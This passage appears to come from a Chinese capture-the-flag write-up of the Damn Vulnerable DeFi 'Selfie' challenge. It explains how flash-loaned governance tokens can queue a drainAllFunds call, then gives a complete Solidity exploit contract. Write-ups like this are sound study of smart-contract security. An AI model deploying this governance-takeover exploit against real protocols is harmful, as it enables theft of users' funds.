&#x6211;&#x4EEC;&#x65E0;&#x6CD5;&#x7ACB;&#x5373;&#x6267;&#x884C;&#x64CD;&#x4F5C;&#xFF0C;&#x56E0;&#x4E3A;&#x6709;2&#x5929;&#x7684;&#x5EF6;&#x8FDF;&#xFF0C;&#x6211;&#x4EEC;&#x5FC5;&#x987B;&#x5148;&#x7B49;&#x5F85;&#x3002;&#x4F46;&#x662F;&#xFF0C;&#x6211;&#x4EEC;&#x5728;&#x8FD9;&#x91CC;&#x6240;&#x8981;&#x505A;&#x7684;&#x5C31;&#x662F;&#x5C06;&#x65F6;&#x95F4;&#x5FEB;&#x8FDB;2&#x5929;&#xFF0C;&#x56E0;&#x4E3A;&#x6CA1;&#x6709;&#x4EC0;&#x4E48;&#x53EF;&#x4EE5;&#x786E;&#x4FDD;&#x6211;&#x4EEC;&#x5728;&#x5EF6;&#x8FDF;&#x671F;&#x95F4;&#x4ECD;&#x7136;&#x6301;&#x6709;&#x8FD9;&#x4E9B;&#x6CBB;&#x7406;&#x4EE4;&#x724C;</p>
</blockquote>
</li>
<li>executeAction<br>
&#x8FD9;&#x4E2A;&#x51FD;&#x6570;&#x4F7F;&#x7528;&#x6765;&#x6267;&#x884C;&#x7684;&#xFF0C;&#x6309;&#x7167;&#x961F;&#x5217;id&#x4E00;&#x4E2A;&#x4EA4;&#x6613;&#x4E00;&#x4E2A;&#x4EA4;&#x6613;&#x7684;&#x6267;&#x884C;&#xFF0C;&#x4F46;&#x662F;&#x8FD9;&#x4E2A;&#x51FD;&#x6570;&#x660E;&#x663E;&#x662F;&#x6709;&#x501F;&#x5165;&#x98CE;&#x9669;&#x7684;&#xFF0C;&#x6211;&#x4EEC;&#x53EA;&#x9700;&#x8981;&#x628A;&#x4F5C;&#x4E3A;&#x53C2;&#x6570;&#x4F20;&#x5165;&#x7684;address&#x6539;&#x4E3A;&#x6211;&#x4EEC;&#x60F3;&#x501F;&#x5165;&#x7684;&#x5408;&#x7EA6;&#x5730;&#x5740;&#xFF0C;&#x7136;&#x540E;&#x5728;&#x6392;&#x961F;&#x7684;&#x65F6;&#x5019;&#x4FEE;&#x6539;<code>data</code>&#x7684;&#x5185;&#x5BB9;&#xFF0C;&#x5F88;&#x5BB9;&#x6613;&#x505A;&#x5230;&#x8FD9;&#x4E00;&#x70B9;&#x3002;&#x8FD9;&#x6837;&#xFF0C;&#x6211;&#x4EEC;&#x5C31;&#x53EF;&#x4EE5;&#x5192;&#x5145;&#x6CBB;&#x7406;&#x5408;&#x7EA6;&#x6765;&#x8C03;&#x7528;<code>drainAllFunds()</code>&#x4E86;&#x3002;</li>
</ul>
</li>
<li>
<p><strong>Exploit</strong><br>
&#x6839;&#x636E;&#x4EE5;&#x4E0A;&#x5206;&#x6790;&#x5199;&#x51FA;Exploit&#x5982;&#x4E0B;&#xFF1A;</p>
</li>
</ul>
<pre data-role="codeBlock" data-info class="language-"><code>pragma solidity ^0.8.0;

import &quot;./SimpleGovernance.sol&quot;;
import &quot;./SelfiePool.sol&quot;;
import &quot;../DamnValuableTokenSnapshot.sol&quot;;

contract SelfieExploit {

    SimpleGovernance public goverance;
    SelfiePool public pool;
    address attcker;
    uint256 actionId;
    constructor(address _pool, address _goverance){
        pool = SelfiePool(_pool);
        goverance = SimpleGovernance(_goverance);
        attcker = msg.sender;
    }

    function exploit (uint256 _amount) public {
        pool.flashLoan(_amount);
    }

    function receiveTokens (address _token, uint256 amount) external {
        DamnValuableTokenSnapshot token = DamnValuableTokenSnapshot(_token);
        token.snapshot();
        actionId = goverance.queueAction(address(pool),
            abi.encodeWithSignature(
                &quot;drainAllFunds(address)&quot;,
                attcker
            ),
            0); 
        token.transfer(address(pool), amount);
    }

    function drainToAttacker() external {
        goverance.executeAction(actionId);
    }

    receive () external payable {}
}

</code></pre><p>&#x603B;&#x7ED3;&#xFF1A;&#x6CBB;&#x7406;&#x5408;&#x7EA6;&#x8D8A;&#x590D;&#x6742;&#xFF0C;&#x8D8A;&#x53EF;&#x80FD;&#x51FA;&#x73B0;&#x6F0F;&#x6D1E;&#xFF0C;&#x4E00;&#x5B9A;&#x8C28;&#x614E;&#x3002;</p>

      </div>
      
      
    
    
    
    
    
    
    
    
  
    </body></html>